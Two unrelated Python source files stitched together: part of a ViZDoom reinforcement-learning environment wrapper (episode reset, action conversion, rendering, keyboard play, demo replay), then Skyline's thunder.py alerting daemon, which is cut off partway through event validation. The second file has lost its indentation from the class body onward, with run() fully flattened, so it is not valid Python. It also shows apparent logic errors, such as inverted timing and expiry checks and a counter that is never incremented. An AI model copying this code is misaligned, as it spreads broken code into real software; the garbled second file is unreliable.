        lines = [l.strip() for l in lines]

        variable_indices = {}

        for line in lines:
            if line.startswith('#'):
                continue  # comment

            variables_syntax = r'available_game_variables[\s]*=[\s]*\{(.*)\}'
            match = re.match(variables_syntax, line)
            if match is not None:
                variables_str = match.groups()[0]
                variables_str = variables_str.strip()
                variables = variables_str.split(' ')
                for i, variable in enumerate(variables):
                    variable_indices[variable] = i
                break

        return variable_indices

    def _black_screen(self):
        """Lazily build and cache an all-zeros fallback observation."""
        if self.black_screen is None:
            self.black_screen = np.zeros(self.observation_space.shape, dtype=np.uint8)
        return self.black_screen

    def _game_variables_dict(self, state):
        """Convert the raw game_variables array into a name->value dict."""
        game_variables = state.game_variables
        variables = {}
        for variable, idx in self.variable_indices.items():
            variables[variable] = game_variables[idx]
        return variables

    def demo_path(self, episode_idx):
        """Return the normalized .lmp demo path for the given episode index."""
        demo_name = f'e{episode_idx:03d}.lmp'
        demo_path = join(self.record_to, demo_name)
        demo_path = os.path.normpath(demo_path)
        return demo_path

    def reset(self):
        """Start a new episode and return the first observation (HWC uint8)."""
        self._ensure_initialized()

        if self.record_to is not None and not self.is_multiplayer:
            # does not work in multiplayer (uses different mechanism)
            if not os.path.exists(self.record_to):
                os.makedirs(self.record_to)
            demo_path = self.demo_path(self._num_episodes)
            log.warning('Recording episode demo to %s', demo_path)
            self.game.new_episode(demo_path)
        else:
            if self._num_episodes > 0:
                # no demo recording (default); the very first episode is
                # started by game.init() itself
                self.game.new_episode()

        self.state = self.game.get_state()
        img = None
        try:
            img = self.state.screen_buffer
        except AttributeError:
            # sometimes Doom does not return screen buffer at all??? Rare bug
            pass

        if img is None:
            log.error('Game returned None screen buffer! This is not supposed to happen!')
            img = self._black_screen()

        # Swap current and previous histogram
        if self.current_histogram is not None and self.previous_histogram is not None:
            swap = self.current_histogram
            self.current_histogram = self.previous_histogram
            self.previous_histogram = swap
            self.current_histogram.fill(0)

        self._actions_flattened = None
        self._last_episode_info = copy.deepcopy(self._prev_info)
        self._prev_info = None

        self._num_episodes += 1

        # CHW -> HWC
        return np.transpose(img, (1, 2, 0))

    def _convert_actions(self, actions):
        """Convert actions from gym action space to the action space expected by Doom game."""
        if self.composite_action_space:
            # composite action space with multiple subspaces
            spaces = self.action_space.spaces
        else:
            # simple action space, e.g. Discrete. We still treat it like composite of length 1
            spaces = (self.action_space, )
            actions = (actions, )

        actions_flattened = []
        for i, action in enumerate(actions):
            if isinstance(spaces[i], Discretized):
                # discretized continuous action
                # check discretized first because it's a subclass of gym.spaces.Discrete
                # the order of if clauses here matters! DON'T CHANGE THE ORDER OF IFS!
                continuous_action = spaces[i].to_continuous(action)
                actions_flattened.append(continuous_action)
            elif isinstance(spaces[i], gym.spaces.Discrete):
                # standard discrete action
                num_non_idle_actions = spaces[i].n - 1
                action_one_hot = np.zeros(num_non_idle_actions, dtype=np.uint8)
                if action > 0:
                    action_one_hot[action - 1] = 1  # 0th action in each subspace is a no-op
                actions_flattened.extend(action_one_hot)
            elif isinstance(spaces[i], gym.spaces.Box):
                # continuous action
                actions_flattened.extend(list(action * self.delta_actions_scaling_factor))
            else:
                raise NotImplementedError(f'Action subspace type {type(spaces[i])} is not supported!')

        return actions_flattened

    def _vizdoom_variables_bug_workaround(self, info, done):
        """Some variables don't get reset to zero on game.new_episode(). This fixes it (also check overflow?)."""
        if done and 'DAMAGECOUNT' in info:
            log.info('DAMAGECOUNT value on done: %r', info.get('DAMAGECOUNT'))

        if self._last_episode_info is not None:
            bugged_vars = ['DEATHCOUNT', 'HITCOUNT', 'DAMAGECOUNT']
            for v in bugged_vars:
                if v in info:
                    info[v] -= self._last_episode_info.get(v, 0)

    def _process_game_step(self, state, done, info):
        """Build (observation, done, info) from a raw game state."""
        if not done:
            observation = np.transpose(state.screen_buffer, (1, 2, 0))
            game_variables = self._game_variables_dict(state)
            info.update(self.get_info(game_variables))
            self._update_histogram(info)
            self._prev_info = copy.deepcopy(info)
        else:
            observation = self._black_screen()

            # when done=True Doom does not allow us to call get_info, so we provide info from the last frame
            # FIX: _prev_info is None if the episode finishes before any
            # non-terminal step (e.g. right after reset); dict.update(None)
            # would raise TypeError.
            if self._prev_info is not None:
                info.update(self._prev_info)

        self._vizdoom_variables_bug_workaround(info, done)
        return observation, done, info

    def step(self, actions):
        """
        Action is either a single value (discrete, one-hot), or a tuple with an action for each of the
        discrete action subspaces.
        """
        if self._actions_flattened is not None:
            # provided externally, e.g. via human play
            actions_flattened = self._actions_flattened
            self._actions_flattened = None
        else:
            actions_flattened = self._convert_actions(actions)

        default_info = {'num_frames': self.skip_frames}
        reward = self.game.make_action(actions_flattened, self.skip_frames)
        state = self.game.get_state()
        done = self.game.is_episode_finished()

        observation, done, info = self._process_game_step(state, done, default_info)
        return observation, reward, done, info

    def render(self, mode='human'):
        """Render the current frame; returns the image, or None if no state."""
        try:
            img = self.game.get_state().screen_buffer
            img = np.transpose(img, [1, 2, 0])

            if mode == 'rgb_array':
                return img

            h, w = img.shape[:2]
            render_w = 1280

            if w < render_w:
                render_h = int(render_w * h / w)
                img = cv2.resize(img, (render_w, render_h))

            if self.viewer is None:
                from gym.envs.classic_control import rendering
                self.viewer = rendering.SimpleImageViewer(maxwidth=render_w)
            self.viewer.imshow(img)
            return img
        except AttributeError:
            return None

    def close(self):
        """Shut down the game and the render viewer, tolerating engine errors."""
        try:
            if self.game is not None:
                self.game.close()
        except RuntimeError as exc:
            log.warning('Runtime error in VizDoom game close(): %r', exc)

        if self.viewer is not None:
            self.viewer.close()

    def get_info(self, variables=None):
        """Return an info dict with agent position plus all game variables."""
        if variables is None:
            variables = self._game_variables_dict(self.game.get_state())

        info_dict = {'pos': self.get_positions(variables)}
        info_dict.update(variables)
        return info_dict

    def get_info_all(self, variables=None):
        """Like get_info(), but also includes the previous coverage histogram."""
        if variables is None:
            variables = self._game_variables_dict(self.game.get_state())
        info = self.get_info(variables)
        if self.previous_histogram is not None:
            info['previous_histogram'] = self.previous_histogram
        return info

    def get_positions(self, variables):
        return self._get_positions(variables)

    @staticmethod
    def _get_positions(variables):
        """Extract agent x/y/angle from game variables; NaN when unavailable."""
        have_coord_data = True
        required_vars = ['POSITION_X', 'POSITION_Y', 'ANGLE']
        for required_var in required_vars:
            if required_var not in variables:
                have_coord_data = False
                break

        x = y = a = np.nan
        if have_coord_data:
            x = variables['POSITION_X']
            y = variables['POSITION_Y']
            a = variables['ANGLE']

        return {'agent_x': x, 'agent_y': y, 'agent_a': a}

    def get_automap_buffer(self):
        """Return the automap image in HWC layout, or None if episode is over."""
        if self.game.is_episode_finished():
            return None
        state = self.game.get_state()
        map_ = state.automap_buffer
        map_ = np.swapaxes(map_, 0, 2)
        map_ = np.swapaxes(map_, 0, 1)
        return map_

    def _update_histogram(self, info, eps=1e-8):
        """Increment the visitation histogram bin for the agent's position."""
        if self.current_histogram is None:
            return
        agent_x, agent_y = info['pos']['agent_x'], info['pos']['agent_y']

        # Get agent coordinates normalized to [0, 1]
        dx = (agent_x - self.coord_limits[0]) / (self.coord_limits[2] - self.coord_limits[0])
        dy = (agent_y - self.coord_limits[1]) / (self.coord_limits[3] - self.coord_limits[1])

        # Rescale coordinates to histogram dimensions
        # Subtract eps to exclude upper bound of dx, dy
        dx = int((dx - eps) * self.current_histogram.shape[0])
        dy = int((dy - eps) * self.current_histogram.shape[1])

        self.current_histogram[dx, dy] += 1

    def _key_to_action(self, key):
        if hasattr(self.action_space, 'key_to_action'):
            return self.action_space.key_to_action(key)
        else:
            return key_to_action_default(key)

    def _keyboard_on_press(self, key):
        """pynput callback: register a pressed key; ESC stops the listener."""
        from pynput.keyboard import Key
        if key == Key.esc:
            self._terminate = True
            return False

        action = self._key_to_action(key)
        if action is not None:
            if action not in self._current_actions:
                self._current_actions.append(action)

    def _keyboard_on_release(self, key):
        """pynput callback: deregister a released key."""
        action = self._key_to_action(key)
        if action is not None:
            if action in self._current_actions:
                self._current_actions.remove(action)

    # noinspection PyProtectedMember
    @staticmethod
    def play_human_mode(env, skip_frames=1, num_episodes=3, num_actions=None):
        """Interactive keyboard-controlled play; ESC terminates."""
        from pynput.keyboard import Listener

        doom = env.unwrapped
        doom.skip_frames = 1  # handled by this script separately

        # noinspection PyProtectedMember
        def start_listener():
            with Listener(on_press=doom._keyboard_on_press, on_release=doom._keyboard_on_release) as listener:
                listener.join()

        listener_thread = Thread(target=start_listener)
        listener_thread.start()

        for episode in range(num_episodes):
            doom.mode = 'human'
            env.reset()
            last_render_time = time.time()
            time_between_frames = 1.0 / 35.0
            total_rew = 0.0

            while not doom.game.is_episode_finished() and not doom._terminate:
                num_actions = 14 if num_actions is None else num_actions
                turn_delta_action_idx = num_actions - 1

                actions = [0] * num_actions
                for action in doom._current_actions:
                    if isinstance(action, int):
                        actions[action] = 1  # 1 for buttons currently pressed, 0 otherwise
                    else:
                        if action == 'turn_left':
                            actions[turn_delta_action_idx] = -doom.delta_actions_scaling_factor
                        elif action == 'turn_right':
                            actions[turn_delta_action_idx] = doom.delta_actions_scaling_factor

                for frame in range(skip_frames):
                    doom._actions_flattened = actions
                    _, rew, _, _ = env.step(actions)

                    new_total_rew = total_rew + rew
                    if new_total_rew != total_rew:
                        log.info('Reward: %.3f, total: %.3f', rew, new_total_rew)
                    total_rew = new_total_rew
                    state = doom.game.get_state()

                    verbose = True
                    if state is not None and verbose:
                        info = doom.get_info()
                        print(
                            'Health:', info['HEALTH'],
                        )

                    time_since_last_render = time.time() - last_render_time
                    time_wait = time_between_frames - time_since_last_render

                    if doom.show_automap and state.automap_buffer is not None:
                        map_ = state.automap_buffer
                        map_ = np.swapaxes(map_, 0, 2)
                        map_ = np.swapaxes(map_, 0, 1)
                        cv2.imshow('ViZDoom Automap Buffer', map_)
                        if time_wait > 0:
                            # FIX: the original int(time_wait) * 1000 truncated
                            # sub-second waits to 0, and cv2.waitKey(0) blocks
                            # until a keypress.  Convert seconds to ms first.
                            cv2.waitKey(max(int(time_wait * 1000), 1))
                    else:
                        if time_wait > 0:
                            time.sleep(time_wait)

                    last_render_time = time.time()

        if doom.show_automap:
            cv2.destroyAllWindows()

        log.debug('Press ESC to exit...')
        listener_thread.join()

    # noinspection PyProtectedMember
    @staticmethod
    def replay(env, rec_path):
        """Replay a previously recorded .lmp demo and log the total reward."""
        doom = env.unwrapped
        doom.mode = 'replay'
        doom._ensure_initialized()
        doom.game.replay_episode(rec_path)

        episode_reward = 0
        start = time.time()

        while not doom.game.is_episode_finished():
            doom.game.advance_action()
            r = doom.game.get_last_reward()
            episode_reward += r

        log.info('Episode reward: %.3f, time so far: %.1f s', episode_reward, time.time() - start)
        log.info('Finishing replay')
        doom.close()
|
thunder.py | import logging
import traceback
from time import time, sleep
from threading import Thread
from multiprocessing import Process
import os
from os import kill, getpid
import os.path
from ast import literal_eval
import settings
from skyline_functions import (
mkdir_p, get_redis_conn, get_redis_conn_decoded, send_graphite_metric,
write_data_to_file)
from thunder_alerters import thunder_alert
from functions.redis.update_set import update_redis_set
from functions.filesystem.remove_file import remove_file
from functions.thunder.check_thunder_failover_key import check_thunder_failover_key
from functions.thunder.alert_on_stale_metrics import alert_on_stale_metrics
from functions.thunder.alert_on_no_data import alert_on_no_data
skyline_app = 'thunder'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
# Lock/wait sentinel files used by bin/<skyline_app>.d log management
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
this_host = str(os.uname()[1])
# Redis sets used to queue incoming thunder events and archive handled ones
thunder_redis_set = 'thunder.events'
thunder_done_redis_set = 'thunder.events.done'
try:
    SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
    if SERVER_METRIC_PATH == '.':
        SERVER_METRIC_PATH = ''
except AttributeError:
    # FIX: narrowed from a bare except (which also swallowed SystemExit and
    # KeyboardInterrupt); only a missing settings.SERVER_METRICS_NAME should
    # fall back to ''.
    SERVER_METRIC_PATH = ''
# The required THUNDER directories which are failed over to and
# used in the event that Redis is down
THUNDER_EVENTS_DIR = '%s/thunder/events' % settings.SKYLINE_TMP_DIR
THUNDER_KEYS_DIR = '%s/thunder/keys' % settings.SKYLINE_TMP_DIR
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
LOCAL_DEBUG = False
class Thunder(Thread):
"""
The Thunder class which controls the thunder thread and spawned
processes. Thunder is ONLY for alerting on Skyline operations.
Thunder checks on the other hand are carried out by analyzer/metrics_manager
and other Skyline apps, which send events to thunder.
thunder/rolling carries out internal and external checks and sends any events
to thunder.
"""
def __init__(self, parent_pid):
    """Create the Thunder daemon thread.

    Records the parent and current process ids for liveness checks, and sets
    up the :obj:`self.redis_conn` (byte) and :obj:`self.redis_conn_decoded`
    (decoded) Redis connections.
    """
    super().__init__()
    self.daemon = True
    self.parent_pid = parent_pid
    self.current_pid = getpid()
    self.redis_conn = get_redis_conn(skyline_app)
    self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
def check_if_parent_is_alive(self):
    """Exit the process if the current or parent process is dead.

    ``kill(pid, 0)`` sends no signal; it only probes the pid and raises
    OSError (ProcessLookupError) when the process no longer exists.
    """
    try:
        kill(self.current_pid, 0)
        kill(self.parent_pid, 0)
    except OSError:
        # FIX: narrowed from a bare except (which also swallowed SystemExit /
        # KeyboardInterrupt); probing a dead pid raises OSError.
        logger.warning('warning :: parent or current process dead')
        exit(0)
def spin_thunder_process(self, i, validated_event_details, redis_item, event_file):
    """
    Roll some thunder.

    Processes a single validated thunder event: works out which alert
    channels (smtp/slack/pagerduty) apply, sends the alerts, sets an alert
    TTL key (plus a filesystem failover copy) and removes the event from the
    Redis queue and/or the failover event file.

    :param i: python process id
    :param validated_event_details: dict with level, event_type, message,
        app, metric, source, expiry, timestamp, alert_vias, data, event_file
    :param redis_item: the raw entry in the thunder.events Redis set, if any
    :param event_file: the failover event file on disk, if any
    :return: anomalous
    :rtype: boolean
    """
    def create_alert_cache_key(cache_key, expiry, timestamp):
        # Set a TTL key so the same alert is not re-sent until expiry.
        try:
            set_alert_cache_key = self.redis_conn.setex(cache_key, expiry, timestamp)
            if set_alert_cache_key:
                logger.info('set Redis key %s with %s TTL' % (
                    cache_key, str(expiry)))
        except Exception as e:
            logger.error('error :: set_alert_cache_key failed setting key - %s - %s' % (
                cache_key, e))
        # Add a key file (filesystem failover used when Redis is down)
        thunder_keys_file = '%s/%s' % (THUNDER_KEYS_DIR, cache_key)
        thunder_keys_file_data = {'timestamp': timestamp, 'expiry': expiry}
        try:
            write_data_to_file(
                skyline_app, thunder_keys_file, 'w',
                str(thunder_keys_file_data))
            logger.info('added Redis failover thunder_keys_file %s' % (thunder_keys_file))
        except Exception as e:
            logger.error('error :: failed to add Redis failover thunder_keys_file - %s - %s' % (thunder_keys_file, e))

    def remove_event(redis_item, event_file):
        # Remove a handled (or unusable) event from the Redis queue and disk.
        if redis_item:
            # Delete the item from the Redis set
            try:
                removed_item = update_redis_set(
                    skyline_app, thunder_redis_set, redis_item,
                    'remove', log=True)
                if removed_item:
                    # NOTE(review): this logs an error on the SUCCESS path and
                    # the message reads like a failure -- looks inverted or
                    # copy-pasted; confirm intent before relying on this log.
                    logger.error('error :: could not determine event_details from %s Redis set entry (removed) - %s' % (
                        thunder_redis_set, str(redis_item)))
            except Exception as e:
                logger.error('error :: could not remove item from Redis set %s - %s' % (
                    thunder_redis_set, e))
        if event_file:
            # Delete the bad event_file
            removed_file = False
            try:
                removed_file = remove_file(skyline_app, event_file)
            except Exception as e:
                logger.error('error :: could not remove event_file %s - %s' % (
                    event_file, e))
            if removed_file:
                logger.info('event_file removed - %s' % (
                    str(event_file)))

    spin_start = time()
    spin_thunder_process_pid = os.getpid()
    logger.info('spin_thunder_process - %s, processing check - %s' % (
        str(spin_thunder_process_pid), str(validated_event_details)))

    # Unpack the event; on failure the variables stay unbound and the
    # branches below will raise (NOTE(review): the original deliberately(?)
    # commented out the early return here).
    try:
        level = str(validated_event_details['level'])
        event_type = str(validated_event_details['event_type'])
        message = str(validated_event_details['message'])
        app = str(validated_event_details['app'])
        metric = str(validated_event_details['metric'])
        source = str(validated_event_details['source'])
        expiry = int(validated_event_details['expiry'])
        timestamp = validated_event_details['timestamp']
        alert_vias = validated_event_details['alert_vias']
        data = validated_event_details['data']
        event_file = validated_event_details['event_file']
    except Exception as e:
        logger.error('error :: spin_thunder_process :: failed to determine variables from event_details - %s' % (
            e))
        # return

    # Handle thunder/rolling alerts first, these are defined by source being
    # thunder, thunder/rolling does not assign alert_vias per alert the
    # defaults are used
    if source == 'thunder' and alert_vias == ['default']:
        logger.info('spin_thunder_process - thunder rolling event')
        # Resolve the default alert channels from settings.THUNDER_CHECKS;
        # a missing key means: smtp on, slack off, pagerduty off.
        alert_vias = []
        alert_via_smtp = True
        alert_via_slack = False
        alert_via_pagerduty = False
        try:
            alert_via_smtp = settings.THUNDER_CHECKS[app][event_type]['alert_via_smtp']
            if alert_via_smtp:
                logger.info('spin_thunder_process - alert_via_smtp: %s' % str(alert_via_smtp))
        except KeyError:
            alert_via_smtp = True
        except Exception as e:
            logger.error('error :: failed to determine alert_via_smtp for %s.%s check - %s' % (
                app, event_type, e))
        if alert_via_smtp:
            alert_vias.append('alert_via_smtp')
            logger.info('spin_thunder_process - alert_via_smtp appended to alert_vias')
        try:
            alert_via_slack = settings.THUNDER_CHECKS[app][event_type]['alert_via_slack']
            logger.info('spin_thunder_process - alert_via_slack: %s' % str(alert_via_slack))
        except KeyError:
            logger.error(traceback.format_exc())
            logger.error('spin_thunder_process - alert_via_slack KeyError')
            alert_via_slack = False
        except Exception as e:
            logger.error('error :: failed to determine alert_via_slack for %s.%s check - %s' % (
                app, event_type, e))
        if alert_via_slack:
            alert_vias.append('alert_via_slack')
            logger.info('spin_thunder_process - alert_via_slack appended to alert_vias')
        try:
            alert_via_pagerduty = settings.THUNDER_CHECKS[app][event_type]['alert_via_pagerduty']
            if alert_via_pagerduty:
                logger.info('spin_thunder_process - alert_via_pagerduty: %s' % str(alert_via_pagerduty))
        except KeyError:
            alert_via_pagerduty = False
        except Exception as e:
            # NOTE(review): message says alert_via_smtp but this is the
            # pagerduty lookup -- copy-paste in the log string.
            logger.error('error :: failed to determine alert_via_smtp for %s.%s check - %s' % (
                app, event_type, e))
        if alert_via_pagerduty:
            alert_vias.append('alert_via_pagerduty')
            logger.info('spin_thunder_process - alert_via_pagerduty appended to alert_vias')

        subject = message
        body = str(data)
        alerts_sent = 0
        logger.info('spin_thunder_process - thunder rolling event alert_vias: %s' % str(alert_vias))
        # Send through each resolved channel; a failure on one channel does
        # not stop the others.
        for alert_via in alert_vias:
            alert_sent = False
            try:
                if alert_via == 'alert_via_slack':
                    title = 'Skyline Thunder - %s' % level.upper()
                    with_subject = subject.replace(level, '')
                    title = title + with_subject
                    alert_sent = thunder_alert(alert_via, title, body)
                if alert_via == 'alert_via_smtp':
                    title = 'Skyline Thunder - %s' % level.upper()
                    with_subject = subject.replace(level, '')
                    final_subject = title + with_subject
                    alert_sent = thunder_alert(alert_via, final_subject, data['status'])
                if alert_via == 'alert_via_pagerduty':
                    alert_sent = thunder_alert(alert_via, subject, str(body))
                if alert_sent:
                    logger.info('sent thunder_alert(%s, %s' % (
                        str(alert_via), str(subject)))
                    alerts_sent += 1
            except Exception as e:
                logger.error('error :: failed to alert_via %s for %s.%s check - %s' % (
                    alert_via, app, event_type, e))
        cache_key = 'thunder.alert.%s.%s' % (app, event_type)
        if alerts_sent:
            # Only 'alert' level sets the suppression TTL key.
            if level == 'alert':
                create_alert_cache_key(cache_key, expiry, timestamp)
            remove_event(redis_item, event_file)
            logger.info('%s alerts sent for the %s alert_vias' % (
                str(alerts_sent), str(len(alert_vias))))

    # stale metric alerts
    if source == 'analyzer' and event_type == 'stale_metrics':
        alerts_sent_dict = {}
        try:
            parent_namespace = data['namespace']
            stale_metrics = data['stale_metrics']
            alerts_sent_dict = alert_on_stale_metrics(self, level, message, parent_namespace, stale_metrics, data)
        except Exception as e:
            logger.error(traceback.format_exc())
            logger.error('error :: alert_on_stale_metrics failed for %s - %s' % (
                parent_namespace, e))
        all_sent = False
        if alerts_sent_dict:
            all_sent = alerts_sent_dict['all_sent']
            logger.info('%s alerts of %s sent for stale_metrics on %s' % (
                str(alerts_sent_dict['to_send']),
                str(alerts_sent_dict['sent']), parent_namespace))
            if not all_sent:
                logger.warn('warning :: all alerts were not sent - %s' % (
                    str(alerts_sent_dict)))
        if all_sent:
            if level == 'alert':
                cache_key = 'thunder.alert.%s.%s.%s.%s' % (
                    app, event_type, level, str(timestamp))
                create_alert_cache_key(cache_key, expiry, timestamp)
            remove_event(redis_item, event_file)

    # no_data alerts
    if source == 'analyzer' and event_type == 'no_data':
        alerts_sent_dict = {}
        parent_namespace = None
        try:
            parent_namespace = data['namespace']
        except Exception as e:
            logger.error(traceback.format_exc())
            logger.error('error :: could not determine parent_namespace from data %s - %s' % (
                str(data), e))
            remove_event(redis_item, event_file)
        send_no_data_alert = True
        if parent_namespace:
            # An existing thunder.alert.no_data.<namespace> key suppresses a
            # repeat alert for the same namespace.
            if level == 'alert':
                thunder_no_data_alert_key = 'thunder.alert.no_data.%s' % parent_namespace
                thunder_no_data_alert_key_exists = False
                try:
                    thunder_no_data_alert_key_exists = self.redis_conn_decoded.get(thunder_no_data_alert_key)
                    if thunder_no_data_alert_key_exists:
                        send_no_data_alert = False
                        logger.info('Redis key %s exists, not send no_data alert for %s' % (
                            thunder_no_data_alert_key, parent_namespace))
                        remove_event(redis_item, event_file)
                except Exception as e:
                    logger.error('error :: failed Redis key %s - %s' % (
                        thunder_no_data_alert_key, e))
        if parent_namespace and send_no_data_alert:
            try:
                alerts_sent_dict = alert_on_no_data(self, level, message, parent_namespace, data)
            except Exception as e:
                logger.error(traceback.format_exc())
                # NOTE(review): message mentions removing event_file but this
                # wraps alert_on_no_data -- looks copy-pasted; verify.
                logger.error('error :: could not remove event_file %s - %s' % (
                    event_file, e))
            all_sent = False
            if alerts_sent_dict:
                all_sent = alerts_sent_dict['all_sent']
                logger.info('%s alerts of %s sent for no_data on %s' % (
                    str(alerts_sent_dict['to_send']),
                    str(alerts_sent_dict['sent']), parent_namespace))
                if not all_sent:
                    logger.warn('warning :: all alerts were not sent - %s' % (
                        str(alerts_sent_dict)))
            if all_sent:
                remove_event(redis_item, event_file)

    spin_end = time() - spin_start
    logger.info('spin_thunder_process took %.2f seconds' % spin_end)
    return
def run(self):
"""
- Called when the process intializes.
- Determine if Redis is up and discover checks to run.
- If Redis is down and discover checks to run from the filesystem.
- Process event.
- Wait for the processes to finish.
- Repeat.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
if not os.path.exists(settings.SKYLINE_TMP_DIR):
try:
mkdir_p(settings.SKYLINE_TMP_DIR)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s - %s' % (settings.SKYLINE_TMP_DIR, e))
# Create the required THUNDER directories which are failed over to and
# used in the event that Redis is down
if not os.path.exists(THUNDER_EVENTS_DIR):
try:
mkdir_p(THUNDER_EVENTS_DIR)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s - %s' % (THUNDER_EVENTS_DIR, e))
if not os.path.exists(THUNDER_KEYS_DIR):
try:
mkdir_p(THUNDER_KEYS_DIR)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s - %s' % (THUNDER_KEYS_DIR, e))
last_sent_to_graphite = int(time())
thunder_alerts_sent = 0
last_check_for_events_on_filesystem = int(last_sent_to_graphite)
while True:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
logger.info('Redis ping OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cannot connect to redis at socket path %s - %s' % (
settings.REDIS_SOCKET_PATH, e))
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
logger.info('connected via get_redis_conn')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: not connected via get_redis_conn - %s' % e)
continue
try:
self.redis_conn_decoded.ping()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: not connected via get_redis_conn_decoded - %s' % e)
sleep(10)
try:
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
logger.info('onnected via get_redis_conn_decoded')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cannot connect to get_redis_conn_decoded - %s' % e)
continue
"""
Determine if any metric has been added to process
"""
thunder_last_run = int(time())
total_thunder_events_item_count = 0
while True:
validated_event_details = {}
current_timestamp = int(time())
if total_thunder_events_item_count == 0:
if (current_timestamp - thunder_last_run) < 3:
sleep(2)
thunder_last_run = int(current_timestamp)
# Report app AND Redis as up
redis_is_up = False
try:
redis_is_up = self.redis_conn.setex(skyline_app, 120, current_timestamp)
if redis_is_up:
try:
logger.info('set thunder Redis key')
self.redis_conn.setex('redis', 120, current_timestamp)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis redis key - %s' % (
e))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis %s key - %s' % (
skyline_app, e))
if not settings.THUNDER_ENABLED:
sleep(59)
break
# break to send metrics
if int(time()) >= (last_sent_to_graphite + 60):
break
# Determine events to process from the Redis set
thunder_events = []
if redis_is_up:
try:
thunder_events = self.redis_conn_decoded.smembers(thunder_redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (thunder_redis_set, e))
# If no data was returned from Redis ensure thunder_events is
# a set so that any event_files can be added to the set
if thunder_events:
logger.info('%s entries in thunder.events Redis set' % str(len(thunder_events)))
if not isinstance(thunder_events, set):
thunder_events = set(thunder_events)
else:
thunder_events = []
thunder_events = set(thunder_events)
# Check the filesystem for failover event files
filesystem_check_timestamp = int(time())
if (last_check_for_events_on_filesystem + 60) >= filesystem_check_timestamp:
last_check_for_events_on_filesystem = filesystem_check_timestamp
logger.info('checking for failover event files in %s' % THUNDER_EVENTS_DIR)
thunder_event_files_count = 0
for root, dirs, files in os.walk(THUNDER_EVENTS_DIR):
if files:
for file in files:
event_file = '%s/%s' % (root, file)
try:
data_dict = None
try:
with open(event_file, 'r') as f:
data_dict_str = f.read()
except Exception as e:
logger.error('error :: failed to open event_file: %s - %s' % (event_file, e))
try:
data_dict = literal_eval(data_dict_str)
if data_dict:
data_dict['event_file'] = event_file
thunder_events.add(str(data_dict))
except Exception as e:
logger.error('error :: failed to literal_eval event_file: %s - %s' % (event_file, e))
except Exception as e:
logger.error('failed evaluate event_file %s - %s' % (
event_file, e))
logger.info('%s thunder failover event files found' % str(thunder_event_files_count))
# Check the filesystem for failover key files
logger.info('checking for failover keys in %s' % THUNDER_KEYS_DIR)
thunder_key_files_count = 0
for root, dirs, files in os.walk(THUNDER_KEYS_DIR):
if files:
for file in files:
thunder_key_file = '%s/%s' % (root, file)
try:
key_dict = None
try:
with open(thunder_key_file, 'r') as f:
key_dict_str = f.read()
key_dict = literal_eval(key_dict_str)
thunder_key_files_count += 1
except Exception as e:
logger.error('error :: failed to open thunder_key_file: %s - %s' % (
thunder_key_file, e))
timestamp = 0
if key_dict:
try:
timestamp = key_dict['timestamp']
expiry = int(key_dict['expiry'])
except Exception as e:
logger.error('error :: failed to determine timestamp and expiry from key_dict created from thunder_key_file: %s - %s' % (
thunder_key_file, e))
if timestamp:
now = int(time())
if (timestamp + expiry) >= now:
expiry = 0
try:
removed_file = remove_file(thunder_key_file)
if removed_file:
logger.info('removed expired thunder_key_file: %s' % (
thunder_key_file))
except Exception as e:
logger.error('error :: failed to remove %s, continuing - %s' % (
thunder_key_file, e))
if (timestamp + expiry) <= now:
expiry = now - (timestamp + expiry)
except Exception as e:
logger.error('failed evaluate thunder_key_file: %s - %s' % (
thunder_key_file, e))
logger.info('%s thunder failover key files found' % str(thunder_key_files_count))
total_thunder_events_item_count = len(thunder_events)
validated_event_details = {}
if thunder_events:
logger.info('getting a thunder event to process from the %s events' % str(total_thunder_events_item_count))
for index, event_item in enumerate(thunder_events):
# if validated_event_details:
# break
try:
remove_item = False
redis_item = event_item
try:
event_details = literal_eval(event_item)
except Exception as e:
remove_item = True
event_details = None
logger.error('error :: could not determine event_details from %s Redis set entry - %s' % (
thunder_redis_set, e))
missing_required_keys = False
if event_details:
logger.info('validating thunder event_details: %s' % str(event_details))
try:
level = str(event_details['level'])
except KeyError:
level = 'alert'
except Exception as e:
logger.error('error :: failed to determine level from event_details dict set to alert - %s' % (
e))
level = 'alert'
